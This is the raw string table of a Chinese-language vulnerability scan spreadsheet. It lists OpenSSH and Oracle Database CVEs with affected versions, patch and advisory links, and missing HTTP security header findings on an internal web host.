https://bugzilla.redhat.com/show_bug.cgi?id=1677794
https://lists.debian.org/debian-lts-announce/2019/03/msg00030.html</t>
  </si>
  <si>
    <t>Portable OpenSSH 'ssh-keysign'本地未授权访问漏洞</t>
  </si>
  <si>
    <t>影响OpenSSH:4.2版本,4.1.p1版本,4.1版本,4.0.p1版本,4.0版本,3.9.p1版本,3.8.1.p1版本,3.8.p1版本,3.7.2.p1版本,3.7.1.p2版本,3.7.1.p1版本,3.7.1版本,3.7.p1版本,3.7..1p2版本,3.7版本,3.6.1.p2版本,3.6.1.p1版本,3.6.1版本,3.5.p1版本,3.5版本,3.4.p1-7版本,3.4.p1-6版本,3.4.p1-5版本,3.4.p1-4版本,3.4.p1-3版本,3.4.p1-2版本,3.4.p1-1版本,3.4.p1版本,3.4版本,3.3.p1版本,3.3版本,5.8版本,5.7版本,5.6版本,5.5版本,5.4版本,5.3版本,5.2p1版本,5.2版本,5.1版本,5.0版本,4.9版本,4.8版本,4.7p1版本,4.7版本,4.6p1版本,4.6版本,4.5版本,4.4.p1版本,4.4版本,4.3p2版本,4.3p1版本,4.2p1版本</t>
  </si>
  <si>
    <t>OpenSSH 5.8 p2已经修复此漏洞，建议用户下载使用：http://www.openssh.com/</t>
  </si>
  <si>
    <t>OpenSSH 'ssh_gssapi_parse_ename()'函数拒绝服务漏洞(CVE-2011-5000)</t>
  </si>
  <si>
    <t>影响OpenSSH:5.8以下版本(含)</t>
  </si>
  <si>
    <t>目前厂商还没有提供此漏洞的相关补丁或者升级程序，建议使用此软件的用户随时关注厂商的主页以获取最新版本：http://www.openssh.com/</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201204-069
http://cxsecurity.com/research/89
http://site.pi3.com.pl/adv/ssh_1.txt
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201103-036</t>
  </si>
  <si>
    <t>OpenSSH 本地信息泄露漏洞(CVE-2016-10011)</t>
  </si>
  <si>
    <t>影响OpenSSH:7.4以下版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://www.openssh.com/txt/release-7.4, 下载高版本链接：http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/，升级方法链接：https://blog.csdn.net/qq_29768197/article/details/125048720</t>
  </si>
  <si>
    <t>http://www.openssh.com/txt/release-7.4
http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/
https://blog.csdn.net/qq_29768197/article/details/125048720</t>
  </si>
  <si>
    <t>OpenSSH默认服务器配置拒绝服务漏洞(CVE-2010-5107)</t>
  </si>
  <si>
    <t>影响OpenSSH:1.2版本(含)到2.9.9p1版本(含),3.0版本(含)到3.0.2p1版本(含),3.1版本(含)到3.1p1版本(含),3.2版本(含)到3.2.3p1版本(含),3.3版本(含)到3.3p1版本(含),3.4版本(含)到3.4p1版本(含),3.5版本(含)到3.5p1版本(含),3.6版本(含)到3.6.1p2版本(含),3.7版本(含)到3.7.1p2版本(含),3.8版本(含)到3.8.1p1版本(含),3.9版本(含)到3.9.1p1版本(含),4.0版本(含)到4.0p1版本(含),4.1版本(含)到4.1p1版本(含),4.2版本(含)到4.2p1版本(含),4.3版本(含)到4.3p2版本(含),4.4版本(含)到4.4p1版本(含),4.5版本(含)到4.5版本(含),4.6版本(含)到4.6版本(含),4.7版本(含)到4.7版本(含),4.8版本(含)到4.8版本(含),4.9版本(含)到4.9版本(含),5.0版本(含)到5.0版本(含),5.1版本(含)到5.1版本(含),5.2版本(含)到5.2版本(含),5.3版本(含)到5.3版本(含),5.4版本(含)到5.4版本(含),5.5版本(含)到5.5版本(含),5.6版本(含)到5.6版本(含),5.7版本(含)到5.7版本(含),5.8版本(含)到5.8p2版本(含),5.9版本(含)到5.9版本(含),6.0版本(含)到6.0版本(含),6.1版本(含)到6.1版本(含)</t>
  </si>
  <si>
    <t>厂商补丁：The openssh Project 目前厂商已经发布升级版本修复此安全问题，建议升级openssh至6.1版本或之后版本，请到厂商的官方页面下载升级版本：链接：http://www.openssh.com/portable.html, 此漏洞扫描采用的是版本扫描，不同发行版本系统的OpenSSH版本存在差异，可能存在误报。对于具体Linux发行版本中使用的版本，可以参考如下链接，确认是否受该漏洞影响：Debian:https://security-tracker.debian.org/tracker/CVE-2010-5107 
Ubuntu:http://people.canonical.com/~ubuntu-security/cve/2014/CVE-2010-5107.html 
Redhat：https://access.redhat.com/security/cve/CVE-2010-5107 
SUSE:http://support.novell.com/security/cve/CVE-2010-5107.html 
Gentoo:http://www.gentoo.org/security/en/glsa/glsa-201405-06.xml 
Aix:http://aix.software.ibm.com/aix/efixes/security/openssh_advisory2.asc 
Fedora:https://lists.fedoraproject.org/pipermail/package-announce/2013-February/099281.html</t>
  </si>
  <si>
    <t>http://www.openssh.com/portable.html</t>
  </si>
  <si>
    <t>OpenSSH do_setup_env函数权限提升漏洞(CVE-2015-8325)</t>
  </si>
  <si>
    <t>影响OpenSSH:7.2p2以下版本(含)</t>
  </si>
  <si>
    <t>厂商补丁:OpenSSH-------目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：https://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-8325.html、https://security-tracker.debian.org/tracker/CVE-2015-8325、https://anongit.mindrot.org/openssh.git/commit/?id=85bdcd7c92fe7ff133bbc4e10a65c91810f88755</t>
  </si>
  <si>
    <t>https://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-8325.html
https://security-tracker.debian.org/tracker/CVE-2015-8325
https://anongit.mindrot.org/openssh.git/commit/?id=85bdcd7c92fe7ff133bbc4e10a65c91810f88755</t>
  </si>
  <si>
    <t>OpenSSH auth_password函数拒绝服务漏洞(CVE-2016-6515)</t>
  </si>
  <si>
    <t>影响OpenSSH:7.3以下版本</t>
  </si>
  <si>
    <t>厂商补丁:OpenSSH-------目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://openwall.com/lists/oss-security/2016/08/01/2或者https://github.com/openssh/openssh-portable/commit/fcd135c9df440bcd2d5870405ad3311743d78d97</t>
  </si>
  <si>
    <t>http://www.openssh.com/txt/release-7.3
http://openwall.com/lists/oss-security/2016/08/01/2
https://github.com/openssh/openssh-portable/commit/fcd135c9df440bcd2d5870405ad3311743d78d97</t>
  </si>
  <si>
    <t>OpenSSH sshd mm_answer_pam_free_ctx释放后重利用漏洞(CVE-2015-6564)</t>
  </si>
  <si>
    <t>影响OpenSSH:6.9以下版本(含)</t>
  </si>
  <si>
    <t>厂商补丁：OpenSSH-------目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://www.openssh.com/txt/release-7.0,https://github.com/openssh/openssh-portable/commit/d4697fe9a28dab7255c60433e4dd23cf7fce8a8b,http://seclists.org/fulldisclosure/2015/Aug/54</t>
  </si>
  <si>
    <t>http://www.openssh.com/txt/release-7.0
https://github.com/openssh/openssh-portable/commit/d4697fe9a28dab7255c60433e4dd23cf7fce8a8b
http://seclists.org/fulldisclosure/2015/Aug/54</t>
  </si>
  <si>
    <t>OpenSSH 'x11_open_helper()'函数安全限制绕过漏洞(CVE-2015-5352)</t>
  </si>
  <si>
    <t>影响OpenSSH:6.9以下版本</t>
  </si>
  <si>
    <t>厂商补丁:OpenSSH-------目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：https://anongit.mindrot.org/openssh.git/commit/?h=V_6_9&amp;id=1bf477d3cdf1a864646d59820878783d42357a1dhttp://www.openssh.com/txt/release-6.9</t>
  </si>
  <si>
    <t>OpenSSH &lt;=7.2p1 xauth命令注入漏洞(CVE-2016-3115)</t>
  </si>
  <si>
    <t>影响OpenSSH:7.1p2以下版本</t>
  </si>
  <si>
    <t>厂商补丁：OpenSSH-------目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：[1] http://www.openssh.com/[2] https://github.com/openssh/openssh-portable/blob/5a0fcb77287342e2fc2ba1cee79b6af108973dc2/session.c#L1388[3] https://github.com/openssh/openssh-portable/blob/19bcf2ea2d17413f2d9730dd2a19575ff86b9b6a/clientloop.c#L376[4] http://linux.die.net/man/1/xauth[5] http://www.openssh.com/txt/x11fwd.adv</t>
  </si>
  <si>
    <t>OpenSSH 安全漏洞(CVE-2016-20012)</t>
  </si>
  <si>
    <t>影响OpenSSH: 8.7及之前版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://github.com/openssh/openssh-portable/pull/270</t>
  </si>
  <si>
    <t>链接：https://github.com/openssh/openssh-portable/pull/270
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-20012</t>
  </si>
  <si>
    <t>OpenSSH client信息泄露漏洞(CVE-2016-0777)</t>
  </si>
  <si>
    <t>影响OpenSSH:5.0版本(含)到7.1.p2版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接： http://www.openssh.com/txt/release-7.1p2</t>
  </si>
  <si>
    <t>OpenSSH 授权问题漏洞(CVE-2021-36368)</t>
  </si>
  <si>
    <t>影响OpenSSH:8.9以下版本</t>
  </si>
  <si>
    <t>厂商补丁: 目前厂商已发布升级补丁以修复漏洞，补丁获取链接：  https://www.openssh.com/security.html</t>
  </si>
  <si>
    <t>OpenSSH roaming_common.c堆缓冲区溢出漏洞(CVE-2016-0778)</t>
  </si>
  <si>
    <t>影响OpenSSH:5.0版本(含)到7.2p2版本</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.openwall.com/lists/oss-security/2023/03/15/8http://www.openssh.com/txt/release-7.1p2</t>
  </si>
  <si>
    <t>OpenSSH 信息泄漏漏洞 (CVE-2023-51385)</t>
  </si>
  <si>
    <t>影响OpenSSH:影响9.6以下版本</t>
  </si>
  <si>
    <t>将 openssh 升级至 9.6 及以上版本</t>
  </si>
  <si>
    <t>https://www.openssh.com/txt/release-9.6</t>
  </si>
  <si>
    <t>OpenSSH 安全漏洞(CVE-2023-51384)</t>
  </si>
  <si>
    <t>影响OpenSSH:9.6版本以下版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接:https://www.openssh.com/txt/release-9.6</t>
  </si>
  <si>
    <t>https://www.openssh.com</t>
  </si>
  <si>
    <t>Oracle Database Server Portable Clusterware 安全漏洞(CVE-2019-2619)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/technetwork/security-advisory/cpuapr2019verbose-5072824.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpuapr2019verbose.html
https://www.oracle.com/technetwork/security-advisory/cpuapr2019verbose-5072824.html</t>
  </si>
  <si>
    <t>Oracle Database Server远程安全漏洞(CVE-2014-0373)</t>
  </si>
  <si>
    <t>影响oracle:11.1.0.7版本, 11.2.0.3版本, 11.2.0.4版本, 12.1.0.1版本, 12.1.0.2版本</t>
  </si>
  <si>
    <t>厂商补丁: Oracle ------ Oracle已经为此发布了一个安全公告（cpujan2015-1972971）以及相应补丁: cpujan2015-1972971：Oracle Critical Patch Update Advisory - January 2015 链接：http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html</t>
  </si>
  <si>
    <t>OpenSSH 访问控制错误漏洞(CVE-2018-20685)</t>
  </si>
  <si>
    <t>参见《OpenSSH 访问控制错误漏洞(CVE-2018-20685)-修复方案》</t>
  </si>
  <si>
    <t>OpenSSH sshd 拒绝服务漏洞 (CVE-2016-10708)</t>
  </si>
  <si>
    <t>影响OpenSSH:7.4之前的版本</t>
  </si>
  <si>
    <t>参见《OpenSSH sshd 拒绝服务漏洞 (CVE-2016-10708)-修复方案》</t>
  </si>
  <si>
    <t>http://blog.swiecki.net/2018/01/fuzzing-tcp-servers.html
https://security.netapp.com/advisory/ntap-20180423-0003/
https://www.openssh.com/releasenotes.html</t>
  </si>
  <si>
    <t>OpenSSH 访问控制错误漏洞 (CVE-2019-6110)</t>
  </si>
  <si>
    <t>参见《OpenSSH 访问控制错误漏洞 (CVE-2019-6110)-修复方案》</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201901-468
https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt
https://security.netapp.com/advisory/ntap-20190213-0001/</t>
  </si>
  <si>
    <t>OpenSSH auth_parse_options函数信任管理漏洞(CVE-2012-0814)</t>
  </si>
  <si>
    <t>影响OpenSSH:1.2版本(含)到5.6版本(含)</t>
  </si>
  <si>
    <t>目前厂商还没有提供此漏洞的相关补丁或者升级程序，建议使用此软件的用户随时关注厂商的主页以获取最新版本：http://www.openbsd.org/</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-399
https://exchange.xforce.ibmcloud.com/vulnerabilities/72756</t>
  </si>
  <si>
    <t>OpenSSH J-PAKE授权问题漏洞(CVE-2010-4478)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://github.com/seb-m/jpake</t>
  </si>
  <si>
    <t>http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/Attic/jpake.c#rev1.5
http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/auth-options.c#rev1.54
http://seb.dbzteam.org/crypto/jpake-session-key-retrieval.pdf</t>
  </si>
  <si>
    <t>OpenSSH glob表达式拒绝服务漏洞(CVE-2010-4755)</t>
  </si>
  <si>
    <t>影响OpenSSH:1.2版本(含)到5.8版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://cvsweb.netbsd.org/cgi-bin/cvsweb.cgi/src/crypto/dist/ssh/Attic/sftp.c#rev1.21.6.1http://cvsweb.netbsd.org/cgi-bin/cvsweb.cgi/src/crypto/dist/ssh/Attic/sftp-glob.c#rev1.13.12.1</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201103-036
http://cxsecurity.com/research/89
http://site.pi3.com.pl/adv/ssh_1.txt</t>
  </si>
  <si>
    <t>OpenSSH 信息泄露漏洞(CVE-2011-4327)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.openssh.com/txt/portable-keysign-rand-helper.adv</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201402-014
http://www.openssh.com/txt/release-5.8p2
http://www.openssh.com/txt/portable-keysign-rand-helper.adv</t>
  </si>
  <si>
    <t>OpenSSH 权限许可和访问控制漏洞(CVE-2014-2532)</t>
  </si>
  <si>
    <t>影响OpenSSH:6.5以下版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.openssh.com/</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201403-336
http://www.securitytracker.com/id/1029925</t>
  </si>
  <si>
    <t>Openssh MaxAuthTries限制绕过漏洞(CVE-2015-5600)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/auth2-chall.c</t>
  </si>
  <si>
    <t>http://seclists.org/fulldisclosure/2015/Jul/92
http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/auth2-chall.c.diff?r1=1.42&amp;r2=1.43&amp;f=h
http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/auth2-chall.c</t>
  </si>
  <si>
    <t>OpenSSH 安全限制绕过漏洞(CVE-2016-10012)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://github.com/openbsd/src/commit/3095060f479b86288e31c79ecbc5131a66bcd2f9，或者下载更高版本进行升级，下载链接：http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/，升级方法链接：https://blog.csdn.net/qq_29768197/article/details/125048720</t>
  </si>
  <si>
    <t>https://support.apple.com/en-us/HT207615
https://lists.apple.com/archives/security-announce/2017/Mar/msg00004.html
https://httpoxy.org
https://github.com/openbsd/src/commit/3095060f479b86288e31c79ecbc5131a66bcd2f9
http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/
https://blog.csdn.net/qq_29768197/article/details/125048720</t>
  </si>
  <si>
    <t>OpenSSH 安全漏洞(CVE-2016-1908)</t>
  </si>
  <si>
    <t>厂商补丁：OpenSSH-------目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://www.openssh.com/txt/release-7.2或者下载更高版本进行升级，下载链接：http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/，升级方法链接：https://blog.csdn.net/qq_29768197/article/details/125048720</t>
  </si>
  <si>
    <t>http://www.openssh.com/txt/release-7.2
http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/
https://blog.csdn.net/qq_29768197/article/details/125048720</t>
  </si>
  <si>
    <t>Oracle Database Server Database Gateway for ODBC组件安全漏洞(CVE-2020-2512)</t>
  </si>
  <si>
    <t>Oracle Database Server Database Gateway for ODBC组件安全漏洞(CVE-2020-2515)</t>
  </si>
  <si>
    <t>Oracle Database Server Oracle Applications DBA组件安全漏洞(CVE-2020-2569)</t>
  </si>
  <si>
    <t>Oracle Database Server Java VM组件安全漏洞(CVE-2020-2968)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpujul2020.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpujul2020verbose.html
https://www.oracle.com/security-alerts/cpujul2020.html</t>
  </si>
  <si>
    <t>Oracle 特制的信息包信息泄露漏洞</t>
  </si>
  <si>
    <t>影响oracle:19c以下版本(含)</t>
  </si>
  <si>
    <t>目前厂商还没有提供此漏洞的相关补丁或者升级程序，建议使用此软件的用户随时关注厂商的主页以获取最新版本： https://www.oracle.com/,升级方法链接：https://blog.csdn.net/weixin_34082213/article/details/116349686</t>
  </si>
  <si>
    <t>https://www.oracle.com/
https://blog.csdn.net/weixin_34082213/article/details/116349686</t>
  </si>
  <si>
    <t>Oracle Fusion Middleware远程漏洞（CVE-2013-2380）</t>
  </si>
  <si>
    <t>影响oracle:27.7.4以下版本</t>
  </si>
  <si>
    <t>1.用户可参考如下厂商提供的安全公告获得补丁信息：http://www.oracle.com/technetwork/topics/security/cpuapr2013-1899555.html2.供应商发布了安全公告及相关补丁信息，修复了此漏洞，建议用户下载使用。避免攻击者通过未知向量影响保密性，完整性和可用性。</t>
  </si>
  <si>
    <t>https://www.cnvd.org.cn/flaw/show/CNVD-2013-03414
http://www.oracle.com/technetwork/topics/security/cpuapr2013-1899555.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2380
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2021_11676&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>OpenSSH 访问控制错误漏洞 (CVE-2019-6109)</t>
  </si>
  <si>
    <t>参见《OpenSSH 访问控制错误漏洞 (CVE-2019-6109)-修复方案》</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201901-467
https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt
https://usn.ubuntu.com/3885-1/
https://lists.debian.org/debian-lts-announce/2019/03/msg00030.html</t>
  </si>
  <si>
    <t>Openssh 命令注入漏洞(CVE-2020-15778)</t>
  </si>
  <si>
    <t>影响OpenSSH:8.3p1以下版本(含)</t>
  </si>
  <si>
    <t>可以禁用scp，改用rsync等缓解风险（可能会导致小文件机器内拷贝变慢），修复方案参考：https://wenku.baidu.com/view/b41e84ca0a75f46527d3240c844769eae009a3e3.html?_wkts_=1668080327922</t>
  </si>
  <si>
    <t>https://www.openssh.com/
https://wenku.baidu.com/view/b41e84ca0a75f46527d3240c844769eae009a3e3.html</t>
  </si>
  <si>
    <t>OpenSSH sshd monitor组件欺骗漏洞(CVE-2015-6563)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.openssh.com/txt/release-7.0</t>
  </si>
  <si>
    <t>https://support.apple.com/HT205375
http://www.openssh.com/txt/release-7.0</t>
  </si>
  <si>
    <t>OpenSSH 远程代码执行漏洞(CVE-2016-10009)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.openssh.com/txt/release-7.4，或者下载更高版本进行升级，下载链接：http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/，升级方法链接：https://blog.csdn.net/qq_29768197/article/details/125048720</t>
  </si>
  <si>
    <t>OpenSSH 远程权限提升漏洞(CVE-2016-10010)</t>
  </si>
  <si>
    <t>https://doc.pfsense.org/index.php/2.3.3_New_Features_and_Changes
http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/
https://blog.csdn.net/qq_29768197/article/details/125048720</t>
  </si>
  <si>
    <t>OpenSSH 'schnorr.c'远程内存破坏漏洞(CVE-2014-1692)</t>
  </si>
  <si>
    <t>影响OpenSSH:6.5以下版本</t>
  </si>
  <si>
    <t>厂商补丁：OpenSSH-------目前厂商已经发布升级版本修复此安全问题，建议升级OpenSSH至最新版本，请到厂商的官方页面下载升级版本：http://www.openssh.com/portable.html对于具体Linux发行版本中使用的版本，可以参考如下链接，确认是否受该漏洞影响：Debian:https://security-tracker.debian.org/tracker/CVE-2014-1692、Ubuntu:http://people.canonical.com/~ubuntu-security/cve/2014/CVE-2014-1692.html、Redhat：https://access.redhat.com/security/cve/CVE-2014-1692、SUSE:http://support.novell.com/security/cve/CVE-2014-1692.html</t>
  </si>
  <si>
    <t>http://www.openssh.com/portable.html
https://security-tracker.debian.org/tracker/CVE-2014-1692
http://people.canonical.com/~ubuntu-security/cve/2014/CVE-2014-1692.html
https://access.redhat.com/security/cve/CVE-2014-1692
http://support.novell.com/security/cve/CVE-2014-1692.html</t>
  </si>
  <si>
    <t>OpenSSH SSH守护进程安全漏洞(CVE-2016-6210)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://www.openssh.com/txt/release-7.3, 下载高版本链接：http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/，升级方法链接：https://blog.csdn.net/qq_29768197/article/details/125048720</t>
  </si>
  <si>
    <t>https://www.openssh.com/txt/release-7.3
http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/
https://blog.csdn.net/qq_29768197/article/details/125048720</t>
  </si>
  <si>
    <t>OpenSSH verify_host_key函数 SSHFP DNS RR 检查绕过漏洞(CVE-2014-2653)</t>
  </si>
  <si>
    <t>影响OpenSSH:6.6以下版本(含)</t>
  </si>
  <si>
    <t>厂商补丁：OpenSSH-------目前厂商已经发布升级版本修复此安全问题，建议升级OpenSSH至6.6之后版本，请到厂商的官方页面下载升级版本：http://www.openssh.com/openbsd.html,http://www.openssh.com/此漏洞扫描采用的是版本扫描，不同发行版本系统的OpenSSH版本存在差异，可能存在误报。对于具体Linux发行版本中使用的版本，可以参考如下链接，确认是否受该漏洞影响：Debian:https://security-tracker.debian.org/tracker/CVE-2014-2653,Ubuntu:http://people.canonical.com/~ubuntu-security/cve/2014/CVE-2014-2653.html,Redhat：https://access.redhat.com/security/cve/CVE-2014-2653,SUSE:http://support.novell.com/security/cve/CVE-2014-2653.html</t>
  </si>
  <si>
    <t>http://www.openssh.com/
https://tools.ietf.org/html/rfc4255
http://www.openssh.com/openbsd.html
https://security-tracker.debian.org/tracker/CVE-2014-2653
http://people.canonical.com/~ubuntu-security/cve/2014/CVE-2014-2653.html
https://access.redhat.com/security/cve/CVE-2014-2653
http://support.novell.com/security/cve/CVE-2014-2653.html</t>
  </si>
  <si>
    <t>OpenSSH 安全漏洞(CVE-2017-15906)</t>
  </si>
  <si>
    <t>影响OpenSSH:7.6以下版本</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.openssh.com/txt/release-7.6</t>
  </si>
  <si>
    <t>OpenSSH 安全漏洞(CVE-2023-51767)</t>
  </si>
  <si>
    <t>影响OpenSSH:9.6版本(含)以下版本</t>
  </si>
  <si>
    <t>OpenSSH 安全漏洞(CVE-2023-48795)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接:https://www.openssh.com/openbsd.html</t>
  </si>
  <si>
    <t>OpenSSH: 7.4</t>
  </si>
  <si>
    <t>OpenSSH 信息泄漏漏洞 (CVE-2018-15919)</t>
  </si>
  <si>
    <t>影响OpenSSH:5.9版本(含)到7.8版本(含)</t>
  </si>
  <si>
    <t>参见《OpenSSH 信息泄漏漏洞 (CVE-2018-15919)-修复方案》</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201808-902
http://seclists.org/oss-sec/2018/q3/180
https://security.netapp.com/advisory/ntap-20181221-0001/</t>
  </si>
  <si>
    <t>OpenSSH ssh-agent远程代码执行漏洞(CVE-2023-38408)</t>
  </si>
  <si>
    <t>影响openssh: 5.5版本（含）到9.3.p1版本（含）</t>
  </si>
  <si>
    <t>该漏洞在OpenSSH 9.3p2版本中已得到修复。建议用户升级到最新版本。对于 OpenBSD，发布了一个勘误补丁来修复此问题。链接如下：https://www.openssh.com/releasenotes.htmlhttps://www.openbsd.org/errata.html</t>
  </si>
  <si>
    <t>https://blog.qualys.com/vulnerabilities-threat-research/2023/07/19/cve-2023-38408-remote-code-execution-in-opensshs-forwarded-ssh-agent</t>
  </si>
  <si>
    <t>OpenSSH 安全漏洞(CVE-2021-41617)</t>
  </si>
  <si>
    <t>影响OpenSSH:6.2版本(含)到8.8版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://bugzilla.suse.com/show_bug.cgi?id=1190975  或者下载更高版本进行升级，下载链接：http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/    升级方法链接：https://blog.csdn.net/qq_29768197/article/details/125048720</t>
  </si>
  <si>
    <t>https://bugzilla.suse.com/show_bug.cgi?id=1190975
http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/
https://blog.csdn.net/qq_29768197/article/details/125048720</t>
  </si>
  <si>
    <t>OpenSSH信息泄露漏洞（CVE-2020-14145）</t>
  </si>
  <si>
    <t>影响OpenSSH:5.7版本(含)到8.6版本(含)</t>
  </si>
  <si>
    <t>SSH 弱加密算法支持</t>
  </si>
  <si>
    <t>攻击者可以利用该信息进行下一步攻击。</t>
  </si>
  <si>
    <t>参见《SSH 弱加密算法支持-修复方案》</t>
  </si>
  <si>
    <t>Oracle TNS Listener SID 可以被猜测</t>
  </si>
  <si>
    <t>影响设置弱SID的Oracle主机。</t>
  </si>
  <si>
    <t>参见《Oracle TNS Listener SID 可以被猜测-修复方案》</t>
  </si>
  <si>
    <t>暂无</t>
  </si>
  <si>
    <t>OpenSSH 用户名枚举漏洞(CVE-2018-15473)</t>
  </si>
  <si>
    <t>影响&lt;=7.7的版本</t>
  </si>
  <si>
    <t>参见《OpenSSH 用户名枚举漏洞(CVE-2018-15473)-修复方案》</t>
  </si>
  <si>
    <t>https://blog.csdn.net/gh0stf1re/article/details/108641707</t>
  </si>
  <si>
    <t>未设置Content-Security-Policy响应头</t>
  </si>
  <si>
    <t>web漏洞</t>
  </si>
  <si>
    <t>http://172.20.34.70:39</t>
  </si>
  <si>
    <t>39</t>
  </si>
  <si>
    <t>远程攻击者可以利用此漏洞进行信息收集，方便下一步的攻击行为</t>
  </si>
  <si>
    <t>修改服务端程序，给 HTTP 响应头加上 Content-Security-Policy</t>
  </si>
  <si>
    <t>未设置X-XSS-Protection响应头</t>
  </si>
  <si>
    <t>http://172.20.34.70:19080</t>
  </si>
  <si>
    <t>19080</t>
  </si>
  <si>
    <t>远程攻击者可以利用此漏洞获取敏感信息</t>
  </si>
  <si>
    <t>需要在Web应用程序的所有页面上设置以下响应头：X-XSS-Protection：1; mode=block</t>
  </si>
  <si>
    <t>未设置X-Permitted-Cross-Domain-Policies响应头</t>
  </si>
  <si>
    <t>修改服务端程序，给 HTTP 响应头加上 X-Permitted-Cross-Domain-Policies</t>
  </si>
  <si>
    <t>未设置X-Content-Type-Options响应头</t>
  </si>
  <si>
    <t>http://172.20.34.70:80</t>
  </si>
  <si>
    <t>80</t>
  </si>
  <si>
    <t>需要在Web应用程序的所有页面上设置以返回头：X-Content-Type-Options：nosniff</t>
  </si>
  <si>
    <t>未设置Strict-Transport-Security响应头</t>
  </si>
  <si>
    <t>需要在Web应用程序的所有页面上设置以下标题：Strict-Transport-Security：max-age = 16070400;请注意，当您设置此标头时，您需要在端口443上运行的Web服务器。如果你没有它并且应用这个修复你的网站将不再可用</t>
  </si>
  <si>
    <t>http://en.wikipedia.org/wiki/Strict-Transport-Security</t>
  </si>
  <si>
    <t>未设置Referrer-Policy响应头</t>
  </si>
  <si>
    <t>修改服务端程序，给 HTTP 响应头加上 Referrer-Policy</t>
  </si>
  <si>
    <t>未设置X-Download-Options响应头</t>
  </si>
  <si>
    <t>修改服务端程序，给 HTTP 响应头加上 X-Download-Options</t>
  </si>
  <si>
    <t>点击劫持:无X-Frame-Options头信息</t>
  </si>
  <si>
    <t>可能会导致点击劫持漏洞</t>
  </si>
  <si>
